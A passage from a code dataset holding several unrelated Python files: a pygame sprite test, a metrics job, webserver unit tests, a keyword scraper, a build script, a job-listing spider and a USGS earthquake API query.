to contain the sprite we're going to pull from the spritesheet\r\n\t\timage = pygame.Surface([width,height]).convert()\r\n\t\t#copy the specified section of spritesheet to the \"image\" surface\r\n\t\timage.blit(self.sprite_sheet, (0,0), (x, y, width, height))\r\n\t\t#set the colour key of the sprite that's going to be returned\r\n\t\timage.set_colorkey(WHITE)\r\n\t\t#return back the section of the sprite sheet we've specified\r\n\t\treturn image\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n\t#set up two values to use to move the sprite along x and y axis\r\n\t#0 means the sprite isnt moving along that axis.\r\n\tchange_x = 0\r\n\tchange_y = 0\r\n\r\n\t#these arrays are to be used to contain the frames for the walk cycle\r\n\twalking_frames_left = []\r\n\twalking_frames_right = []\r\n\tdirection = \"R\"\r\n\r\n\tdef __init__(self):\r\n\t\tpygame.sprite.Sprite.__init__(self)\r\n\t\t#load the sprite sheet\r\n\t\tsprite_sheet = SpriteSheet(\"bret_run_sprite_sheet.png\")\r\n\t\t#specify how many frames are contained in the sprite sheet\r\n\t\tframes_in_walk_cycle=8\r\n\t\t#work out the width of each individual frame\r\n\t\tsprite_width=sprite_sheet.rect.width / frames_in_walk_cycle\r\n\t\t#as all sprites are on one line the height of each frame is the same as the sprite sheet\r\n\t\tsprite_height=sprite_sheet.rect.height\r\n\t\t\r\n\t\t#cycle through each frame in sprite sheet\r\n\t\tfor i in range(frames_in_walk_cycle):\r\n\t\t\t#assign current frame to a temporary frame image\r\n\t\t\ttemp_frame = sprite_sheet.get_image(i * sprite_width, 0, sprite_width, sprite_height)\r\n\t\t\t#add current frame to array of right-facing walking frame images\r\n\t\t\tself.walking_frames_right.append(temp_frame)\r\n\t\t\t#flip frame over on x-axis to get left facing image\r\n\t\t\ttemp_frame = pygame.transform.flip(temp_frame, True, False)\r\n\t\t\t#add current frame to array of left-facing wlaking frame images\r\n\t\t\tself.walking_frames_left.append(temp_frame)\r\n\r\n\t\t#set initial frame image\t\r\n\t\tself.image = self.walking_frames_right[0]\r\n\r\n\t\t#create rectangle object to hold frame info\r\n\t\tself.rect = self.image.get_rect()\r\n\r\n\tdef update(self):\r\n\t\t\r\n\t\t#move left/right\r\n\t\tself.fall_from_jump()\r\n\t\tself.rect.x += self.change_x\r\n\t\tpos = self.rect.x\r\n\t\t\r\n\t\t#set how many pixels we need to move by before walk cycle frame changes\r\n\t\tpixels_per_frame=30\r\n\r\n\t\t# This determines what the current walk cycle frame is. This is a bit of a fudge -\r\n\t\t# basically every position in the 'game world' has a walk cycle frame assigned to it\r\n\t\t# - this is worked out by dividing the current position (pos) by the number of pixels we\r\n\t\t# need to move by before the frame changes (pixels_per_frame) - to ensure that this always\r\n\t\t# gives a value within the range of walk cycle frames available, we divide that number by\r\n\t\t# the number of frames available and set the current frame to the remainder (done using 'modulus')\r\n\t\t\r\n\t\tif self.direction == \"R\": # if heading right, use the right-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_right)\r\n\t\t\tself.image = self.walking_frames_right[frame]\r\n\t\telse: # otherwise use the left-facing frames\r\n\t\t\tframe = (pos // pixels_per_frame) % len(self.walking_frames_left)\r\n\t\t\tself.image = self.walking_frames_left[frame]\r\n\r\n\t\t# Move up/down\r\n\t\tself.rect.y += self.change_y\r\n\t\t\t\r\n\t# if player directs character to go left, then change x position by -6\r\n\tdef go_left(self):\r\n\t\tself.change_x = -6\r\n\t\tself.direction = \"L\"\r\n\t\r\n\t# if player directs character to go right, then change x position by +6\r\n\tdef go_right(self):\r\n\t\tself.change_x = 6\r\n\t\tself.direction = \"R\"\r\n\t\r\n\tdef fall_from_jump(self):\r\n\t\tif self.change_y == 0:\r\n\t\t\tself.change_y = 1\r\n\t\telse:\r\n\t\t\tself.change_y += .5\r\n\t\t\r\n\t\tif self.rect.y >= GAME_FLOOR - self.rect.height and self.change_y >= 0:\r\n\t\t\tself.change_y = 0\r\n\t\t\tself.rect.y = GAME_FLOOR - self.rect.height\r\n\t\t\t\r\n\tdef jump(self):\r\n\t\t\t# check player is standing on the floor\r\n\t\t\tif self.rect.bottom >= GAME_FLOOR:\r\n\t\t\t\tself.change_y = -10\r\n\t\t\t\r\n\t# if player stops directing character, then set the amount to change x by to 0\r\n\tdef stop(self):\r\n\t\tself.change_x = 0\r\n\r\n\r\ndef main():\r\n\t# set up initial game environment\r\n\tglobal SCREEN_WIDTH, SCREEN_HEIGHT, BLACK, WHITE, BLUE\r\n\tpygame.init()\r\n\tscreen = pygame.display.set_mode([SCREEN_WIDTH,SCREEN_HEIGHT])\r\n\tpygame.display.set_caption(\"Walk Cycle Test\")\r\n\r\n\t# create player\r\n\tplayer = Player()\r\n\r\n\t# set players initial x-axis position\r\n\tplayer.rect.x = 340\r\n\t# set players initial y-axis position to be at bottom of screen\r\n\tplayer.rect.y = GAME_FLOOR - player.rect.height\r\n\t\r\n\t# create a group to hold our sprites\r\n\tactive_sprite_list = pygame.sprite.Group()\r\n\t# add player sprite to the sprite group\r\n\tactive_sprite_list.add(player)\r\n\r\n\t# set up initial game loop \r\n\tdone = False\r\n\tclock = pygame.time.Clock()\r\n\r\n\t### - MAIN GAME LOOP - ###\r\n\twhile not done:\r\n\t\t# look for user input\r\n\t\tfor event in pygame.event.get():\r\n\t\t\t# exit if user closes window\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tdone = True\r\n\t\t\t\r\n\t\t\t# check to see if a key is pressed down\r\n\t\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\t\t# if left arrow is pressed, then go left\r\n\t\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\t\tplayer.go_left()\r\n\t\t\t\t# if right arrow is pressed, go right\r\n\t\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\t\tplayer.go_right()\r\n\t\t\t\t# if up arrow is pressed, then jump\r\n\t\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\t\tplayer.jump()\r\n\t\t\t\t\r\n\t\t\t# check for when user releases key\r\n\t\t\tif event.type == pygame.KEYUP:\r\n\t\t\t\t# if the depressed key was the left arrow and the amount to move the\r\n\t\t\t\t# player character by is still set to a non zero amount, then stop the player\r\n\t\t\t\t# - this is to prevent the player character from continuing to move after the key is\r\n\t\t\t\t# released.\r\n\t\t\t\tif event.key == pygame.K_LEFT and player.change_x < 0:\r\n\t\t\t\t\tplayer.stop()\r\n\t\t\t\t# same as above but for right arrow\r\n\t\t\t\tif event.key == pygame.K_RIGHT and player.change_x > 0:\r\n\t\t\t\t\tplayer.stop()\r\n\r\n\t\t### Draw current level in buffer ####\r\n\t\tscreen.fill(BLACK)\r\n\t\t### Update Sprite Positions in buffer ###\r\n\t\tactive_sprite_list.update()\r\n\t\t### Draw Sprites ###\r\n\t\tactive_sprite_list.draw(screen)\r\n\r\n\t\t### Set game FPS ###\r\n\t\tclock.tick(60)\r\n\r\n\t\t### Draw buffer to screen ###\r\n\t\tpygame.display.flip()\r\n\t\r\n\t# Main game loop has exited here so we can tidy up and exit.\r\n\tpygame.quit()\r\n\r\nmain()\r\n\t\t\r\n\t\t\r\n", "sub_path": "Projects/Old_2d_scroller_files/platformer_tests/walk_jump.py", "file_name": "walk_jump.py", "file_ext": "py", "file_size_in_byte": 6980, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.image.load", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 134, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 134, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 146, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 157, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 157, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 183, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 197, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 200, "usage_type": "call"}]} {"seq_id": "483545748", "text": "# coding=utf-8\n\n# 周累计用户、付费信息统计\n# Author:liqianxi\n# Date:2015/03/10\n\nimport os\nimport logging\nimport datetime\n\nfrom pygodzilla.stream_handler import metrics\nfrom pygodzilla.context import Context\n\nfrom pipelines import *\n\n\nlogging.basicConfig(format='%(levelname)s %(asctime)-15s '\n '%(filename)s@%(funcName)s:%(message)s',\n level=logging.INFO)\n\nos.environ['HADOOP_USER_NAME'] = 'godzilla'\n\n\ndef week_days():\n return lambda x: (x,\n x + datetime.timedelta(days=1), x + datetime.timedelta(days=2), x + datetime.timedelta(days=3),\n x + datetime.timedelta(days=4), x + datetime.timedelta(days=5), x + datetime.timedelta(days=6))\n\n\nctx = Context(\"sdk\", {\n \"mongo_host\": \"10.0.0.57\",\n \"mongo_database\": \"godzilla\"\n})\n\n# 用户、设备(分应用)\nweekly_users_by_app_id = metrics('sdk', reg_or_login_events.with_date(week_days()),\n group_by='appId',\n rules=[\n ('__weekly_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_devices_by_app_id', 'countDistinct(deviceId)')\n ])\n\n# 活跃用户、活跃设备(分应用)\nweekly_active_users_by_app_id = metrics('sdk', login_events.with_date(week_days()),\n group_by=\"appId\",\n rules=[\n ('__weekly_active_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_active_devices_by_app_id', 'countDistinct(deviceId)')\n ])\n\n# 付费用户(分应用)\nweekly_pay_users_by_app_id = metrics('sdk', weekly_pay_users_amounts,\n group_by=\"appId\",\n rules=[\n ('__weekly_pay_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_pay_real_amount_by_app_id', 'sum(realAmount)')\n ])\n\n# 用户、设备\nweekly_users = metrics('sdk', reg_or_login_events.with_date(week_days()),\n rules=[\n ('__weekly_users', 'countDistinct(userId)'),\n ('__weekly_devices', 'countDistinct(deviceId)')\n ])\n\n# 活跃用户、活跃设备\nweekly_active_users = metrics('sdk', login_events.with_date(week_days()),\n rules=[\n ('__weekly_active_users', 'countDistinct(userId)'),\n ('__weekly_active_devices', 'countDistinct(deviceId)')\n ])\n\n# 付费用户\nweekly_pay_users = metrics('sdk', weekly_pay_users_amounts,\n rules=[\n ('__weekly_pay_users', 'countDistinct(userId)'),\n ('__weekly_pay_real_amount', 'sum(realAmount)')\n ])\n\nall_metrics = [\n weekly_users_by_app_id,\n weekly_active_users_by_app_id,\n weekly_pay_users_by_app_id,\n weekly_users,\n weekly_active_users,\n weekly_pay_users\n]\n\nctx.add_tasks(all_metrics)\n\nif __name__ == '__main__':\n ctx.run('weekly')\n", "sub_path": "sdk/weekly.py", "file_name": "weekly.py", "file_ext": "py", "file_size_in_byte": 3389, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.basicConfig", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 27, "usage_type": "call"}, {"api_name": "pygodzilla.context.Context", "line_number": 30, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 36, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 44, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 52, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 60, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 67, "usage_type": "call"}, {"api_name": "pygodzilla.stream_handler.metrics", "line_number": 74, "usage_type": "call"}]} {"seq_id": "223990801", "text": "# pylint:disable=unused-import\n# pylint:disable=unused-argument\n# pylint:disable=redefined-outer-name\n\nimport logging\nimport sys\nfrom pathlib import Path\n\nimport openapi_core\nimport pytest\nimport yaml\nfrom aiohttp import web\n\nimport simcore_service_webserver\nfrom servicelib.application_keys import APP_CONFIG_KEY, APP_OPENAPI_SPECS_KEY\nfrom servicelib.rest_responses import unwrap_envelope\nfrom simcore_service_webserver import resources, rest\nfrom simcore_service_webserver.rest import setup_rest\nfrom simcore_service_webserver.security import setup_security\n\nlogging.basicConfig(level=logging.INFO)\n\n\n# TODO: reduce log from openapi_core loggers\n\n@pytest.fixture\ndef openapi_path(api_specs_dir):\n specs_path = api_specs_dir / 'oas3/v0/openapi.yaml'\n assert specs_path.exits()\n return specs_path\n\n@pytest.fixture\ndef spec_dict(openapi_path):\n with openapi_path.open() as f:\n spec_dict = yaml.safe_load(f)\n return spec_dict\n\n@pytest.fixture\ndef client(loop, aiohttp_unused_port, aiohttp_client, api_specs_dir):\n app = web.Application()\n\n server_kwargs={'port': aiohttp_unused_port(), 'host': 'localhost'}\n # fake config\n app[APP_CONFIG_KEY] = {\n \"main\": server_kwargs,\n \"rest\": {\n \"version\": \"v0\",\n \"location\": str(api_specs_dir / \"v0\" / \"openapi.yaml\")\n }\n }\n # activates only security+restAPI sub-modules\n setup_security(app)\n setup_rest(app, debug=True)\n\n cli = loop.run_until_complete( aiohttp_client(app, server_kwargs=server_kwargs) )\n return cli\n\n# ------------------------------------------\n\nasync def test_check_health(client):\n resp = await client.get(\"/v0/\")\n payload = await resp.json()\n\n assert resp.status == 200, str(payload)\n data, error = tuple(payload.get(k) for k in ('data', 'error'))\n\n assert data\n assert not error\n\n assert data['name'] == 'simcore_service_webserver'\n assert data['status'] == 'SERVICE_RUNNING'\n\nasync def test_check_action(client):\n QUERY = 'value'\n ACTION = 'echo'\n FAKE = {\n 'path_value': 'one',\n 'query_value': 'two',\n 'body_value': {\n 'a': 'foo',\n 'b': '45'\n }\n }\n\n resp = await client.post(\"/v0/check/{}?data={}\".format(ACTION, QUERY), json=FAKE)\n payload = await resp.json()\n data, error = tuple(payload.get(k) for k in ('data', 'error'))\n\n assert resp.status == 200, str(payload)\n assert data\n assert not error\n\n # TODO: validate response against specs\n\n assert data['path_value'] == ACTION\n assert data['query_value'] == QUERY\n assert data['body_value'] == FAKE\n\n@pytest.mark.skip(reason=\"DEV: Dummy login\")\nasync def test_auth_register(client, caplog):\n caplog.set_level(logging.ERROR, logger='openapi_spec_validator')\n caplog.set_level(logging.ERROR, logger='openapi_core')\n\n response = await client.post('v0/auth/register',\n json = {\n 'email': 'bar@mail.com',\n 'password': 'my secret',\n 'confirm': 'my secret',\n },\n )\n payload = await response.json()\n\n assert response.status==web.HTTPOk.status_code, str(payload)\n\n data, error = [payload[k] for k in ('data', 'error')]\n assert not error\n assert data\n\n assert 'message' in data\n assert data.get('logger') == \"user\"\n\n # possible usage\n client_log = logging.getLogger(data.get('logger', __name__))\n level = getattr(logging, data.get('level', \"INFO\"))\n client_log.log(level, msg=data['message'])\n\n@pytest.mark.skip(reason=\"DEV: Dummy login\")\nasync def test_auth_login(client, caplog):\n\n log_filter = logging.Filter(name='simcore_service_webserver')\n logging.getLogger().addFilter(log_filter)\n\n # valid registration\n response = await client.post('v0/auth/register',\n json = {\n 'email': 'foo@mymail.com',\n 'password': 'my secret',\n 'confirm': 'my secret',\n },\n )\n payload = await response.json()\n assert response.status==200, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert not error\n assert data\n\n # FIXME: routing errors are returned as text and not json!!\n\n # valid login on registered ser\n response = await client.post('v0/auth/login',\n json = {\n 'email': 'foo@mymail.com',\n 'password': 'my secret',\n },\n )\n payload = await response.json()\n assert response.status==200, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert not error\n assert data\n\n\n # invalid login\n response = await client.post('v0/auth/login',\n json = {\n 'email': 'foo@mymail.com',\n 'password': 'wrong pass',\n },\n )\n payload = await response.json()\n assert response.status==web.HTTPUnprocessableEntity.status_code, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert error\n assert not data\n\n\n # logout\n response = await client.get('v0/auth/logout')\n\n payload = await response.json()\n assert response.status==web.HTTPOk.status_code, str(payload)\n\n data, error = unwrap_envelope(payload)\n assert not error\n assert data # logs\n assert all( k in data for k in ('level', 'logger', 'message') )\n\n@pytest.mark.skip(reason=\"SAN: this must be added to ensure easier transition\")\nasync def test_start_pipeline(client):\n\n resp = await client.post(\"/start_pipeline\",\n json={\n \"project_id\":\"asdfsk-sdfsdgsd-sdfsfd-sdfsd\",\n \"workbench\":{\n \"eroiuriet-dsffdgjh-eriter-dfdfg\":{\n\n }\n }\n\n })\n assert resp.status == 200\n\n payload = await resp.json()\n data, error = tuple(payload.get(k) for k in ('data', 'error'))\n\n assert data\n assert not error\n\n assert data['name'] == 'simcore_service_webserver'\n assert data['status'] == 'SERVICE_RUNNING'\n", "sub_path": "services/web/server/tests/unit/test_rest.py", "file_name": "test_rest.py", "file_ext": "py", "file_size_in_byte": 5895, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "attribute"}, {"api_name": "aiohttp.web.Application", "line_number": 40, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 40, "usage_type": "name"}, {"api_name": "servicelib.application_keys.APP_CONFIG_KEY", "line_number": 44, "usage_type": "name"}, {"api_name": "simcore_service_webserver.security.setup_security", "line_number": 52, "usage_type": "call"}, {"api_name": "simcore_service_webserver.rest.setup_rest", "line_number": 53, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 102, "usage_type": "attribute"}, {"api_name": "aiohttp.web.HTTPOk", "line_number": 113, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 113, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 123, "usage_type": "call"}, {"api_name": "pytest.mark.skip", "line_number": 99, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 99, "usage_type": "attribute"}, {"api_name": "logging.Filter", "line_number": 130, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 131, "usage_type": "call"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 144, "usage_type": "call"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 160, "usage_type": "call"}, {"api_name": "aiohttp.web.HTTPUnprocessableEntity", "line_number": 173, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 173, "usage_type": "name"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 175, "usage_type": "call"}, {"api_name": "aiohttp.web.HTTPOk", "line_number": 184, "usage_type": "attribute"}, {"api_name": "aiohttp.web", "line_number": 184, "usage_type": "name"}, {"api_name": "servicelib.rest_responses.unwrap_envelope", "line_number": 186, "usage_type": "call"}, {"api_name": "pytest.mark.skip", "line_number": 127, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pytest.mark.skip", "line_number": 191, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 191, "usage_type": "attribute"}]} {"seq_id": "328824468", "text": "import requests\nimport json\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nimport threading\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef jsonload() :\n req = requests.get('https://www.naver.com/')\n html = req.text\n soup = BeautifulSoup(html, 'html.parser')\n mysearch = soup.select(\n '.PM_CL_realtimeKeyword_rolling_base > div > ul > li > a > .ah_k'\n )\n data = json.load(open(os.path.join(BASE_DIR, 'result.json'), mode='r+', encoding='utf8'))\n nowstring = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n data[nowstring] = []\n for title in mysearch:\n data[nowstring].append(title.text)\n with open(os.path.join(BASE_DIR, 'result.json'), mode='w+', encoding='utf8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=\"\\t\")\n\ndef main():\n jsonload()\n threading.Timer(10, main).start()\n\nmain()", "sub_path": "parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 881, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}, {"api_name": "threading.Timer", "line_number": 26, "usage_type": "call"}]} {"seq_id": "80999557", "text": "from cx_Freeze import setup, Executable\n\ninc=[]\ninc.append(\"sip\")\ninc.append(\"PyQt4.QtCore\")\ninc.append(\"PyQt4.QtGui\")\ninc.append(\"LauePlaneCfg\")\ninc.append(\"StereoCfg\")\n\nopts=dict(includes=inc,\n icon=\"icons/clip.ico\",\n compressed=True,\n base=\"Win32GUI\",\n append_script_to_exe=True,\n optimize=1)\n\n\nsetup(\n name = \"Clip\",\n version = \"3.0c\",\n description = \"The Cologne Laue Indexation Program\",\n executables = [Executable(\"clip.py\")],\n options={\"build_exe\": opts})\n\n", "sub_path": "tags/release-1.0beta3/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 545, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cx_Freeze.setup", "line_number": 18, "usage_type": "call"}, {"api_name": "cx_Freeze.Executable", "line_number": 22, "usage_type": "call"}]} {"seq_id": "359112179", "text": "\"\"\"\nCatenon spider created on the top of ATSSpider\n\nscrapy crawl catenon -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://catenon.com/jobs\"\n\nSample URL:\n http://catenon.com/jobs\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\nfrom urllib import urlencode\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace\n\npattern = {\n 'open_parenthesis': compile(r'([(])'),\n 'close_parenthesis': compile(r'([)])'),\n}\n\n\nclass Catenon(ATSSpider):\n\n name = 'catenon'\n # Taking table header and map to english headers\n mapping_table_headers = {\n 'Position': 'title',\n 'Location': 'location',\n 'Reference': 'ref_id',\n 'Sector': 'jobcategory',\n }\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n logo_url = sel.xpath(\n '//div[contains(@class, \"logo\")]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(\n response.url, logo_url[0].replace('..', '')\n )\n categories = sel.xpath(\n '//div/select[@id=\"areaSearchSelect\"]/option[not(position()=1)]/@value'\n ).extract()\n params = {\n 'idpais': '-1',\n 'idareaCrm': '-1',\n 'idpuestoCrm': '-1',\n 'keywords': '',\n }\n for cat_value in categories:\n params.update({'idareaCrm': str(cat_value)})\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(\n response.url,\n '/jobs/search.action?%s' % urlencode(params)\n )\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n\n table_header = sel.xpath(\n '//table[@id=\"jobs\"]/thead/tr/td/strong/text()'\n ).extract()\n meta_xpaths = {}\n for th in table_header:\n if th in self.mapping_table_headers:\n meta_xpaths[\n self.mapping_table_headers[th]\n ] = './td[%s]//text()' % str(table_header.index(th) + 1)\n for tr in sel.xpath(\n '//table[@id=\"jobs\"]/tbody/tr'\n ):\n job_url = tr.xpath('./td/a/@href').extract()\n if job_url:\n meta_data = {}\n for key, value in meta_xpaths.iteritems():\n meta_data[key] = tr.xpath(value).extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta_data,\n url=urljoin(response.url, job_url[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detalle_oferta\"]/div/h3/text()'\n )\n if not loader.get_output_value('title'):\n loader.add_value(\n 'title', response.meta.get('title')\n )\n loader.add_value(\n 'location',\n response.meta.get('location'),\n Replace(pattern['open_parenthesis'], ', '),\n Replace(pattern['close_parenthesis'])\n )\n loader.add_value(\n 'referencenumber',\n response.meta.get('ref_id'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n [\n '//div/h3[contains(text(), \"Functions\")]',\n '//div/h3[contains(text(), \"Functions\")]/../following-sibling::ul[1]'\n ]\n )\n loader.add_xpath(\n 'requirements',\n [\n '//div/h3[contains(text(), \"Requirements\")]',\n '//div/h3[contains(text(), \"Requirements\")]/../following-sibling::ul[1]'\n ]\n )\n loader.add_value(\n 'jobcategory', response.meta.get('jobcategory')\n )\n loader.add_value(\n 'logo_url', self.logo_url\n )\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n", "sub_path": "brightcorp/brightcorp/spiders/catenon.py", "file_name": "catenon.py", "file_ext": "py", "file_size_in_byte": 4351, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "re.compile", "line_number": 21, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 22, "usage_type": "call"}, {"api_name": "brightcorp.base.atsspiders.ATSSpider", "line_number": 26, "usage_type": "name"}, {"api_name": "scrapy.selector.Selector", "line_number": 39, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 44, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 58, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 60, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 62, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 67, "usage_type": "call"}, {"api_name": "scrapy.http.Request", "line_number": 86, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 89, "usage_type": "call"}, {"api_name": "scrapy.selector.Selector", "line_number": 96, "usage_type": "call"}, {"api_name": "brightcorp.items.BrightcorpItemLoader", "line_number": 98, "usage_type": "call"}, {"api_name": "brightcorp.processors.Replace", "line_number": 111, "usage_type": "call"}, {"api_name": "brightcorp.processors.Replace", "line_number": 112, "usage_type": "call"}, {"api_name": "brightcorp.processors.Prefix", "line_number": 117, "usage_type": "call"}]} {"seq_id": "226854586", "text": "import datetime as dt\nimport pandas as pd\nimport requests \n\nyesterday = dt.date.today() - dt.timedelta(days=1)\n\napi_url = 'https://earthquake.usgs.gov/fdsnws/event/1/query'\n\napi_args = {\n 'format': 'geojson',\n 'starttime' : yesterday - dt.timedelta(days=30),\n 'endtime' : yesterday\n}\n\nresponse = requests.get(api_url, params=api_args)\nprint(response)\n\nearthquake_json = response.json()\n#print(earthquake_json.keys()) \nprint(earthquake_json['metadata'])\n", "sub_path": "Ch02/ch02_api.py", "file_name": "ch02_api.py", "file_ext": "py", "file_size_in_byte": 462, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "datetime.date.today", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 5, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 5, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 11, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}]} {"seq_id": "554549333", "text": "''' 绘制散点图 '''\nimport matplotlib.pyplot as 